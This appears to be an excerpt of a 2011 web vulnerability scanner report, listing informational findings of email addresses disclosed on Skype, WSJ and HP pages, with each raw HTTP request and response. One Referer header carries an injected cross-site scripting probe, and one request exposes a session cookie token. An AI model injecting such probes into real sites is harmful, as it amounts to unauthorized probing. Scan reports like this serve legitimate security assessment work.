/* Marketguard v4 Real Time Statistics Tracking Tracking generator Copyright 2003-2010,SoDoIt,LLC. Unauthorized use and distribution is STRICTLY PROHIBITED. For licensing terms,please contact sales@sodoit.com */ var rtsHold=_;var _={W:window,D:document,L:location,t:new Date,p:function(a,d){a[a.length]=d},f:String.fromCharCode,Z:function(s,i,t){t="";for(i=0;i<s.length;i++){t+='%'+s.charCodeAt(i).toString(16
...[SNIP]...

20.78. https://secure.skypeassets.com//i/js/skype-common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skypeassets.com
Path:   //i/js/skype-common.js

Issue detail

The following email address was disclosed in the response:

Request

GET //i/js/skype-common.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://support.skype.com/en-us/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: secure.skypeassets.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 37111
Content-Type: application/javascript
Content-Language: en
Date: Sun, 04 Sep 2011 18:08:45 GMT
Connection: keep-alive
Vary: Accept-Encoding

/**
* Copyright (c) 2009-2010, Skype Technologies S.A. All rights reserved.
* Originally partly based on YUI library (http://developer.yahoo.com/yui/),
* also some techniques from jQuery library (h
...[SNIP]...
<martin.kapp@skype.net>
...[SNIP]...

20.79. https://secure.skypeassets.com/i/js/skype-common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skypeassets.com
Path:   /i/js/skype-common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /i/js/skype-common.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-name
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: secure.skypeassets.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 37111
Content-Type: application/javascript
Content-Language: en
Date: Sun, 04 Sep 2011 18:00:10 GMT
Connection: keep-alive
Vary: Accept-Encoding

/**
* Copyright (c) 2009-2010, Skype Technologies S.A. All rights reserved.
* Originally partly based on YUI library (http://developer.yahoo.com/yui/),
* also some techniques from jQuery library (h
...[SNIP]...
<martin.kapp@skype.net>
...[SNIP]...

20.80. http://shop.skype.com/apps/Business/Clownfish-for-Skype.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Business/Clownfish-for-Skype.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Business/Clownfish-for-Skype.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:info@clownfish-translator.com" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.81. http://shop.skype.com/apps/Business/Zaplee-Phone-System-In-The-Cloud.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Business/Zaplee-Phone-System-In-The-Cloud.html

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/Business/Zaplee-Phone-System-In-The-Cloud.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.82. http://shop.skype.com/apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.83. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-Call-Recorder.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/Pamela-Call-Recorder.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Call-recording-audio-only/Pamela-Call-Recorder.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:contact@pamela.biz" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.84. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:contact@pamela.biz" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.85. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:support@prettymay.net" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.86. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:support@prettymay.net" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.87. http://shop.skype.com/apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:support@evaer.com" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.88. http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://shop.skype.com/apps/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: shop.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Content-Length: 58076
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.89. http://shop.skype.com/apps/Desktop-whiteboard-sharing/IDroo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Desktop-whiteboard-sharing/IDroo.html

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/Desktop-whiteboard-sharing/IDroo.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.90. http://shop.skype.com/apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:support@InnerPass.com" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.91. http://shop.skype.com/apps/Faxing/PamFax-for-Mac-OS-X.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Faxing/PamFax-for-Mac-OS-X.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Faxing/PamFax-for-Mac-OS-X.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:support@pamfax.biz" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.92. http://shop.skype.com/apps/Faxing/PamFax-for-Windows.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Faxing/PamFax-for-Windows.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Faxing/PamFax-for-Windows.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:support@pamfax.biz" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.93. http://shop.skype.com/apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.94. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Android.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Mobile-video-communications/Qik-Video-for-Android.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Mobile-video-communications/Qik-Video-for-Android.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:support@qik.com" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.95. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Apple.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Mobile-video-communications/Qik-Video-for-Apple.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/Mobile-video-communications/Qik-Video-for-Apple.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:support@qik.com" rel="external">
...[SNIP]...
<a href="mailto:app-directory@skype.net" rel="external">
...[SNIP]...

20.96. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0001/provided/j_global_slim/version/20110902073344.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sj.wsj.net
Path:   /djscript/bucket/NA_WSJ/page/0_0_WA_0001/provided/j_global_slim/version/20110902073344.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /djscript/bucket/NA_WSJ/page/0_0_WA_0001/provided/j_global_slim/version/20110902073344.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 02 Sep 2011 11:33:54 GMT
Vary: Accept-Encoding
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep08 - Fri 09/02/11 - 07:33:54 EDT
Content-Type: application/x-javascript
Content-Length: 1354455
Cache-Control: max-age=3440719
Expires: Fri, 14 Oct 2011 12:02:31 GMT
Date: Sun, 04 Sep 2011 16:17:12 GMT
Connection: close

/*
   Copyright (c) 2004-2011, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/


if(
...[SNIP]...
<u-suke@kawa.net>
...[SNIP]...
","anus","biotches","boobs","m0r0n","fuckage","h-o-n-k-y","fuckkk","c.u.n.t.","f-ing","cornholed","fuctard","mcwar","oblahblah","mcshit","http://www.debtchallenges.com","http://blog.tradingideas.in/","infotips@yahoo.com","dirtbags","azzes","goddam","bimbo","chick","doodoohead","www.themastertrader.net","monoprice.com","http://www.dollartalk.net","shlt","dumbasses","phucked","http://www.jewwatch.com/","shiti","www.you
...[SNIP]...

20.97. http://sj.wsj.net/djscript/require/j_global_slim/version/20110831104810.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sj.wsj.net
Path:   /djscript/require/j_global_slim/version/20110831104810.js

Issue detail

The following email address was disclosed in the response:

Request

GET /djscript/require/j_global_slim/version/20110831104810.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep01 - Wed 08/31/11 - 10:48:13 EDT
Last-Modified: Wed, 31 Aug 2011 14:48:13 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: application/x-javascript
Content-Length: 230242
Cache-Control: max-age=3277840
Expires: Wed, 12 Oct 2011 14:47:53 GMT
Date: Sun, 04 Sep 2011 16:17:13 GMT
Connection: close


if(typeof dj=="undefined"){dj={};}
if(typeof dj.context=="undefined"){dj.context={};}
if(typeof djConfig=="undefined"){this.djConfig={};}
(function(){var ctx=dj.context,djc=djConfig;ctx.core=(ctx.cor
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...

20.98. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

Issue detail

The following email address was disclosed in the response:

Request

GET /en/faq/FA1170/How-can-I-contact-Skype-Customer-Service HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:19 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51161


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How can I contact Skype Customer Service?</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
<a href="mailto:contactus@skype.net">contactus@skype.net</a>
...[SNIP]...

20.99. http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://welcome.hp-ww.com
Path:   /country/us/en/styles/hpweb_styles_mac.css

Issue detail

The following email address was disclosed in the response:

Request

GET /country/us/en/styles/hpweb_styles_mac.css HTTP/1.1
Host: welcome.hp-ww.com
Proxy-Connection: keep-alive
Referer: http://search.hp.com/query.html?lang=en&qp=&search=&qt=xss&la=en&hps=Home&hpr=http%3A//h41131.www4.hp.com/us/en&charset=utf-8&cc=us&hpn=Home&hpa=http%3A//www.hp.com/country/us/en/contact_us.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:42 GMT
Expires: Sun, 04 Sep 2011 16:51:47 GMT
Cache-Control: max-age=3600
Content-Type: text/css
ETag: "44634faa1e400"
Accept-Ranges: bytes
Server: Apache
Content-Length: 11683

/* -- HPWEB STYLE SHEET hpweb_styles_mac.css VERSION hpweb.1.2i --*/

body,td,th {font-family: Arial, Verdana, Helvetica, Sans-serif; font-size: 12px;}

td img.decoration {display: block;}
tr.dec
...[SNIP]...
; font-weight:bold;} /*-- NEW Addition - January 2003 --*/
.countryInd {color:#333333;} /*-- NEW Addition - January 2003 --*/
.srchradbtn {background-color:#E7E7E7;}

/*-- COMPAQ STYLE ADDITIONS - dgarcia@hp.com - January 2003 --*/
.color990000 {color:#990000;}
.color990000bld {color:#990000; font-weight:bold;}
.colorCCCCCCbg {background-color:#CCCCCC;}
.colorE7E7E7bg {background-color:#E7E7E7;}

a.
...[SNIP]...

20.100. http://welcome.hp-ww.com/js/hpweb_soctag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://welcome.hp-ww.com
Path:   /js/hpweb_soctag.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/hpweb_soctag.js HTTP/1.1
Host: welcome.hp-ww.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:45 GMT
Expires: Mon, 05 Sep 2011 00:32:34 GMT
Cache-Control: max-age=7200
Content-Type: application/x-javascript
ETag: "468915685d280"
Accept-Ranges: bytes
Server: Apache
Content-Length: 11827

if(document.location.protocol=="https:"){var soc_protDir="https://secure.hp-ww.com/";}else{var soc_protDir="http://welcome.hp-ww.com/";}
if(!window.encodeURIComponent){var soc_page_url=location.href;
...[SNIP]...
<ryan@wonko.com>
...[SNIP]...

